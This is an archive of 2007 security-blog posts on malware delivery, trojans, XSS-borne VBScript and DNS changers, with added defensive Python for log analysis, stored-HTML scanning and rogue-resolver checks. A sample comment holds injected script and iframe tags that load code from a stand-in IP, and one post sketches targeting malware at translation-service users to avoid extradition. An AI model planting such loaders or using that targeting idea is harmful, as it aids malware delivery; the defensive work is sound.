web application security lab

Archive for the 'Anti-Virus' Category

80% of Malware Served By Ads

Tuesday, March 27th, 2007

There’s an interesting article about some research Finjan did, with their finding that 80% of malware is served by ads. Setting aside the statistic itself, which you can either agree with or not (maybe it’s 80% of what Finjan detected), it’s still an interesting trend. However, one thing struck me in the article that they almost glossed over: they mentioned that one trend is embedding the code so that it executes when the page is viewed through a translation service. Interesting.

There are a few reasons this is interesting. Firstly, it’s kind of a slap in the face to people who think that using a translation service somehow makes them safer or more private (I’ve never understood why people think that, since their browser still downloads all the embedded content directly from your server), and secondly it really opens up a new way to target your attack. It’s easy to tell when a user is viewing your page through a translation service: the referring URL gives it away, or the lack of a referring URL on requests that follow a pull of the page from a translation service’s address (this could be aided by unique IDs on images to track them back to specific pages).

Now, using the translation service to learn that your target is in some area that speaks whatever language they are translating into, you can be reasonably sure they are in an area that has no extradition treaties with wherever you are hosting. That can greatly reduce the likelihood of getting caught, while still maintaining a good number of malware infections. Kinda nasty. I might be reading a little too far into Finjan’s findings, but still, it’s interesting to think about.
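To make the detection side of this concrete, here is an added example (mine, not code from the post or from Finjan) that applies both signals above to a web server’s access log: a tracking-image fetch whose Referer is a known translation proxy, and a referer-less fetch from a client that the first signal already tagged. The proxy hostnames, the per-page tracking-image naming scheme (/article/42 embeds /img/t-42.gif) and the log lines are all constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Hostnames of translation proxies. Assumed list: extend it with whatever shows up in your own logs.
TRANSLATION_HOSTS = {"translate.google.com", "babelfish.altavista.com", "babelfish.yahoo.com"}

# Assumed tracking scheme: /article/42 embeds exactly one 1x1 image named /img/t-42.gif,
# so a fetch of that image can be tied back to the page even when no Referer arrives.
TRACK_IMG = re.compile(r"^/img/t-(\d+)\.gif$")

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample: the proxy (203.0.113.7) fetches the HTML server-side, then the reader's
# own browser (198.51.100.9) fetches the embedded images, once with the proxy as Referer and
# once with none; 192.0.2.5 is an ordinary direct visitor.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Mar/2007:10:01:02 +0000] "GET /article/42 HTTP/1.1" 200 5120 "-" "Mozilla/4.0 (compatible)"
198.51.100.9 - - [27/Mar/2007:10:01:03 +0000] "GET /img/t-42.gif HTTP/1.1" 200 43 "http://translate.google.com/translate_c?u=http://example.test/article/42&hl=en" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de)"
198.51.100.9 - - [27/Mar/2007:10:01:40 +0000] "GET /img/t-43.gif HTTP/1.1" 200 43 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de)"
192.0.2.5 - - [27/Mar/2007:10:02:00 +0000] "GET /article/42 HTTP/1.1" 200 5120 "http://example.test/" "Mozilla/5.0"
192.0.2.5 - - [27/Mar/2007:10:02:01 +0000] "GET /img/t-42.gif HTTP/1.1" 200 43 "http://example.test/article/42" "Mozilla/5.0"
"""


def referer_host(referer):
    """Hostname of a Referer value, or None when the browser sent none ("-")."""
    if referer in ("", "-"):
        return None
    return urlsplit(referer).hostname


def page_for_image(path):
    """Map a tracking-image path back to the page that embeds it, or None."""
    m = TRACK_IMG.match(path)
    return f"/article/{m.group(1)}" if m else None


def find_translated_views(log_text):
    """Return {client_ip: {page, ...}} for page views that came through a translation proxy."""
    tagged = set()            # client IPs already seen arriving via a translation proxy
    views = defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        page = page_for_image(m["path"])
        if page is None:
            continue          # only the tracking images are attributable to a page
        ip, host = m["ip"], referer_host(m["referer"])
        if host in TRANSLATION_HOSTS:
            tagged.add(ip)    # signal 1: the Referer is the proxy itself
            views[ip].add(page)
        elif host is None and ip in tagged:
            views[ip].add(page)   # signal 2: no Referer, but this client was tagged moments ago
    return dict(views)


if __name__ == "__main__":
    print(find_translated_views(SAMPLE_LOG))
```

The direct visitor never shows up because its Referer is our own host; the proxy’s own fetch of the HTML never shows up either, because only the tracking images carry a page identity. In a real log you would also want a time window on the second signal rather than tagging a client forever.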

Good Writeup On the GOZI Trojan

Friday, March 23rd, 2007

digi7al64 and Rahul both alerted me to a really good writeup on the Gozi trojan written by Don Jackson. Not only is it a good writeup, but it’s extremely thorough on all the details, from the transmission to how the code operates, to what it does once installed, etc… etc… Very good writeup indeed. The major scary part about this trojan is that it is specifically designed to steal information that would otherwise be hidden from a network eavesdropper by SSL, since it grabs the data on the infected machine before it is encrypted.

I think my only beef with the writeup (and this is a nitpick, really) is that the example output is from Wireshark instead of an HTTP proxy, so it’s difficult to read what’s going on and parts of the headers are cut off. Wireshark is a great program, it’s just not ideal for looking at HTTP traffic in an intelligible way (although that could be a nice feature enhancement for it, or even turning it into an HTTP MITM itself). Again, that’s a nitpick, because this is a great writeup.

Windows Live Italy Being Used Maliciously

Tuesday, March 20th, 2007

Zach sent me a link to a Hack in the Box article about how Windows Live is being used by blackhat SEO (search engine optimization) to bring malware links to the top of the search results. This marriage between blackhat SEO and hacking is starting to take off. It’s unclear what tactic they used to get to the top of the search results, but clearly it worked, as they ended up taking over quite a bit of the results on Live’s Italian site.

Once users were on the site, apparently they were served links to malware sites. The search engine itself was used as a conduit for sending people to the malicious search pages. This is yet another reason why search engines shouldn’t index XSS: even if the site is benign, they would be indexing links to malicious pages on benign sites. Anyway, interesting read, and it’s scary that the SEO community is now dabbling in hacking as well. It was only a matter of time.

JavaScript XSS is Conduit For Viruses (but so is VBScript)

Thursday, March 15th, 2007

I know this sort of attack has been around for a while, but perhaps not quite in this way and not with quite as many servers affected: there is a report over at SANS about an XSS attack that injects VBScript which installs malware. Ben Heinkel alerted me to it and actually put up two screenshots here and here showing how the code actually worked. Pretty nasty stuff, especially as it appears there is no virus definition for this particular variant yet.

However, there are two things about this that are more interesting from an attack perspective. The first is that this was not calling malware that had been uploaded to the compromised site. Why bother? Since the sites themselves had XSS holes in them (I’m assuming persistent), the only requirement was that the executable and the VBScript were housed somewhere on the Internet. No longer do you have to upload your malware to the machine you want to infect people from. Who needs all that hassle when all you really need to do is link to it?

The second thing that’s interesting is that this uses VBScript. Firefox users might be cheering, since they wouldn’t be vulnerable to this without a plugin, but really it’s a pretty interesting point that it is easier to write malware that installs executables in VBScript than in JavaScript. Although JavaScript is still the favorite for port scanning and controlling the page, it was VBScript that was used in this attack. I think people tend to forget about VBScript, but it’s potentially just as nasty considering the wide user base (Internet Explorer) that supports it.
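The two points above (the payload only has to be linked from somewhere off-site, and it may be VBScript rather than JavaScript) suggest a cheap audit for any site that stores user-supplied HTML: walk the stored fragments and flag every element that loads code from a host you don’t own, plus any script block that declares itself VBScript. The following is an added example of that audit, written for this page and not taken from the SANS report or from Ben’s screenshots; the site’s own hostnames and the sample comment are constructed. It is a detection aid for finding injections that already landed, not a substitute for output encoding, which is the actual fix for the XSS hole.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed: hostnames that are "ours"; anything else a stored fragment loads code from is off-site.
SITE_HOSTS = {"example.test", "www.example.test"}

# Elements whose src/data attribute pulls executable content from wherever it points.
LOADER_TAGS = {"script": "src", "iframe": "src", "frame": "src", "embed": "src", "object": "data"}


def is_offsite(url):
    """True when a URL names a host outside SITE_HOSTS (scheme-relative //host counts too)."""
    host = urlsplit(url.strip()).hostname
    return host is not None and host.lower() not in SITE_HOSTS


class RemoteCodeFinder(HTMLParser):
    """Collect (kind, url) findings for off-site code loaders and any VBScript in a fragment."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases tag and attribute names, so <SCRIPT LANGUAGE=...> is handled too.
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            lang = (a.get("language", "") + " " + a.get("type", "")).lower()
            if "vbs" in lang:
                self.findings.append(("vbscript", a.get("src", "inline")))
        url_attr = LOADER_TAGS.get(tag)
        if url_attr and a.get(url_attr) and is_offsite(a[url_attr]):
            self.findings.append(("offsite-" + tag, a[url_attr]))


def scan_fragment(html):
    """Return the list of findings for one stored HTML fragment (a comment, a profile, a post)."""
    p = RemoteCodeFinder()
    p.feed(html)
    p.close()
    return p.findings


# Constructed stored comment: a legitimate on-site script next to two injected loaders.
SAMPLE_COMMENT = """
<p>Nice post!</p>
<script src="/js/site.js"></script>
<SCRIPT LANGUAGE="VBScript" SRC="http://203.0.113.9/dl.vbs"></SCRIPT>
<iframe src="//203.0.113.9/drop.html" width="1" height="1"></iframe>
"""

if __name__ == "__main__":
    for kind, url in scan_fragment(SAMPLE_COMMENT):
        print(kind, url)
```

The on-site script is ignored, while the VBScript loader is reported twice (once for being VBScript at all, once for being off-site) and the 1x1 iframe is reported for pointing off-site. Run it over every stored fragment, not just the ones a user complained about, since the attacker picks the host, not you.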

U.S. Government Testing Cybersecurity

Friday, February 16th, 2007

I’ve been asking about this for years now, but I finally got my answer: yes, the US government is going to test the state of cyber-security in the event of a cyber war. The goal is to identify weaknesses and come up with solutions to a large scale network attack. I was bitching about this when I was a member of the IT-ISAC; there was no one working on this at the time, and it was scaring the crap out of me. Apparently someone was listening!

I have no idea how the test is going to play out, but to anyone who is involved, let me reiterate this issue: the attacks often come from within. It’s not only outside threats we are going to have to contend with (and furthermore, once something is inside a network it’s hard to get out). So is the case with viruses, XSS worms, botnets, etc… You may be able to kill the command and control, but that relies on one critical assumption: that there is one. Anyway, I’ll be very interested to see the results of these tests if they are ever published.

Pharming Worms Are Real

Friday, January 19th, 2007

Am I going to have to eat my words? I was thumbing through some AV reports over the last few days and one report stuck out at me. Granted, I don’t follow each worm (not enough hours in the day for all the things I’d like to explore), but I was surprised to see a worm that had to do with pharming. For those of you who are unfamiliar with the term, unlike phishing, pharming takes a more proactive approach by pointing the victim’s DNS resolution at a different, malicious server. Frankly, I thought it was mostly the stuff of science fiction, since no one could point to a single instance of pharming affecting more than about 100 people (a single ISP that got its DNS compromised). Granted, the trojan’s description doesn’t mention pharming, but that is the obvious next step if it isn’t already doing it (rather than just trying to get some click-through traffic to some websites).

Trojan.Flush.K, also known as Trojan.Dnschanger, modifies the DNS settings on your Windows box and attempts to forward you to a malicious website. The obvious synergies with phishing attacks make this particular one stand out to me. Symantec rated this one very low (probably due both to the lack of virulence and the ease of cleaning the system), but it’s interesting to note how potentially dangerous this could be if it were more widespread and written with more malice.
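Because a DNS changer only has to alter one setting, the cheapest detection is to check that setting against what it should be. The script below is an added example (mine, not from Symantec’s writeup and not a description of how the trojan itself works) that parses the output of ipconfig /all on a Windows machine and flags any configured resolver outside the networks your policy allows; the allowed range and the ipconfig output are constructed. The same policy check applies to the per-interface NameServer value under HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces, which is where the configured resolvers live in the registry.

```python
import ipaddress
import re

# Assumed policy: the only resolvers a machine on this network should ever be using.
ALLOWED_RESOLVERS = [ipaddress.ip_network("192.168.1.0/24")]

ADAPTER_RE = re.compile(r"^\S.*adapter (?P<name>.+):\s*$")
DNS_RE = re.compile(r"^\s+DNS Servers[ .]*: (?P<ip>\S+)\s*$")
CONT_RE = re.compile(r"^\s{20,}(?P<ip>\d+\.\d+\.\d+\.\d+)\s*$")   # extra resolvers on their own lines

# Constructed "ipconfig /all" output: the wired adapter has been pointed at an off-site resolver,
# with the legitimate one left in second place so that lookups still work when the rogue one is down.
SAMPLE_IPCONFIG = """\
Windows IP Configuration

        Host Name . . . . . . . . . . . . : workstation01

Ethernet adapter Local Area Connection:

        IP Address. . . . . . . . . . . . : 192.168.1.50
        DNS Servers . . . . . . . . . . . : 203.0.113.53
                                            192.168.1.1

Ethernet adapter Wireless Network Connection:

        IP Address. . . . . . . . . . . . : 192.168.1.77
        DNS Servers . . . . . . . . . . . : 192.168.1.1
"""


def parse_dns_servers(text):
    """Return {adapter_name: [resolver, ...]} from ipconfig /all output, in configured order."""
    servers, adapter, in_dns = {}, None, False
    for line in text.splitlines():
        m = ADAPTER_RE.match(line)
        if m:
            adapter, in_dns = m["name"], False
            servers.setdefault(adapter, [])
            continue
        m = DNS_RE.match(line)
        if m and adapter:
            servers[adapter].append(m["ip"])
            in_dns = True
            continue
        m = CONT_RE.match(line) if in_dns else None
        if m:
            servers[adapter].append(m["ip"])
        else:
            in_dns = False
    return servers


def rogue_resolvers(servers, allowed=ALLOWED_RESOLVERS):
    """Return [(adapter, resolver)] for every configured resolver outside the allowed networks."""
    rogue = []
    for adapter, ips in servers.items():
        for ip in ips:
            try:
                addr = ipaddress.ip_address(ip)
            except ValueError:
                rogue.append((adapter, ip))      # not even an address: flag it
                continue
            if not any(addr in net for net in allowed):
                rogue.append((adapter, ip))
    return rogue


if __name__ == "__main__":
    for adapter, ip in rogue_resolvers(parse_dns_servers(SAMPLE_IPCONFIG)):
        print(f"{adapter}: unexpected DNS server {ip}")
```

Note that the rogue entry is listed first: order matters, because the resolver in first place answers every query that doesn’t time out, so checking only that "the real resolver is still there" would miss this.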

The Small Business Primer on Network Security Threats

Wednesday, January 17th, 2007

I know I don’t often talk about network security (that’s really more id’s domain than mine anyway), but I got sent this link this morning that I thought I’d share. It’s the small business primer on network security threats. It’s a pretty good, brief overview of what you want to do as a small company to make sure you are secure from the more common threats out there. It’s a pretty good high level read. There are a few things I’d probably have added if I had written it.

Anti-Spyware: spyware is really, really nasty. I don’t care what people say, it’s one of the nastiest things out there today, not just because it can read what you are doing, but because with minor changes it can force your system to download viruses, keyloggers or whatever else they want. It’s nearly impossible to stop without a good anti-spyware program. People may confuse this with a trojan, but a trojan is something with an implicit back door. With spyware or adware, the people running it can inadvertently land you on a site that makes them a few bucks while the other server in question hands you something malicious. It’s not a trojan by design, but it can act as one.

Network segregation: id could probably go off on this one bullet alone, but by separating your networks (wireless separate from corporate, etc…) you hugely reduce the damage done by having one machine compromised.

Local admin genie: Don’t let the local admin genie out of the bottle. If you give your users local admin rights, they will do way more with the computer than you would want them to. The second you give them the privileges to install anything, you have opened yourself up to attack. It’s hugely inconvenient for users who want to install their favorite MMORPG on your work computers, but it’ll save you tons of hassle.

SSL/SSH/VPN: Encrypt your traffic. Even if someone can ARP spoof their way past a switch, they’ll be reading garbage. Don’t let them see your traffic. This is in response to their WiFi honeypot (I think they meant a MITM bridge, but you get the idea).

Turn off all unneeded services: It’s a simple one, but this is one of the most important for corporate security. There’s no reason to keep FTP open if you have SSH: you can SCP things over SSH, so shut down that exploitable, outdated wu-ftpd service.

Email separation: Keep work and personal email separate. That way, if your users get an email from their bank at their work address they’ll be more likely to know it’s fraud. Further, don’t click on links in emails, ever! That’s what we call bad. If you really want to cause a revolt, ban all access to freemail services, because really, what are you paying them for?

Backups: If you aren’t backing your data up, something as simple as a misplaced cup of coffee can bring your business to a halt. Network security involves good application security as well, and disaster recovery is a key component of that.

Anyway, I’m sure there are dozens of other simple things you can do, but that stuff definitely will help. Interesting read for the IT novices.

Surfing the Web Can Make You a Sex Offender

Sunday, January 14th, 2007

This is a really upsetting story about how a teenager was infected by a trojan, had his computer used as a fileserver for child pornography, and was then prosecuted as a sex offender. The sex offender charge was based on a plea after he admitted to showing other teenaged boys a Playboy magazine. The circumstances are so ridiculous it’s just painful to read. The gist is that the boy visited a porn site that infected his computer, and then the police detected the computer uploading child pornography.

I was asked, after being sent this, whether having a firewall and anti-virus is enough to protect your computer. Unfortunately the answer is no. Let’s think about session riding for a second. With a simple IMG tag it is trivial to make any user download images from any website that doesn’t protect itself against hotlinking. In this way a user can visit an otherwise benign site and be forced to download child pornography, perform attacks on servers, or do whatever else the attacker wants, by proxy. Very scary.

Google Blacklist Breakdown

Thursday, January 4th, 2007

Michael Sutton has a good writeup on the Google blacklist that he released today. He went over the obvious stats: who’s getting phished the most, where the phishers are hosting, etc… So for the most part it wasn’t that interesting to me personally (but I’ve been in this business for years). However, one thing did make me think. Michael mentioned that the lack of sophistication points towards the lack of need for sophistication.

Like any stats person would, I had to think about what that really means. Is it that they don’t require sophistication, or is it that they can’t achieve it? Who is building the phishing kits that they buy? Are these people the world’s best programmers? Are they going to build something that’s in vogue for a few days (a 0day browser exploit) only to have to re-code it a few days later when the patch rolls out?

Just like in any business, the name of the game is scalability. You have to build a scalable product as cheaply as possible. Just because x% of people have anti-phishing in their browser doesn’t mean you don’t put the site up. That’s like saying that if you’re McDonald’s you don’t want to stay in business because a certain slice of the population cares about early heart disease. Who cares? If it makes you money, that’s all that’s important. Sophistication is not a current requirement for their business model. The scary thing is that with technology that is years old, they are only now encountering tools that even put a dent in their business model.

The lack of sophistication in our own tools to detect and take down phishing sites is the real issue here. We (browser companies, AV companies, ISPs) have not done enough damage to their business to force them to adopt next generation tactics. So although they may have the arms necessary to fight a nuclear war, they don’t have to, because we’re still fighting with bows and arrows. They haven’t even scratched the surface of technical sophistication in their phishing attacks. And who could blame them? There’s no cost incentive to do so. We haven’t created that incentive yet.

Semi Reflective XSS Worm hits

Thursday, January 4th, 2007

I go to sleep for a few hours and I miss all the fun. Apparently Kyran wrote and turned on an XSS worm against In just 3-4 hours over 1500 people were infected with the benign virus. I chatted with Kyran about this, and although it used a persistent means to propagate it was really a reflective payload. One could argue it’s completely persistent, but it’s interesting none-the-less.

Here’s the source to Gaiaworm.

Clearly these types of worms are becoming more commonplace as the propagation methods become more widely understood. Unfortunately most of these worms happen to look a lot like ordinary AJAX, so it’s difficult to write signatures for them. I’m surprised the anti-virus/anti-malware community hasn’t tried to solve this one yet. This is really their domain of expertise: self-replicating code.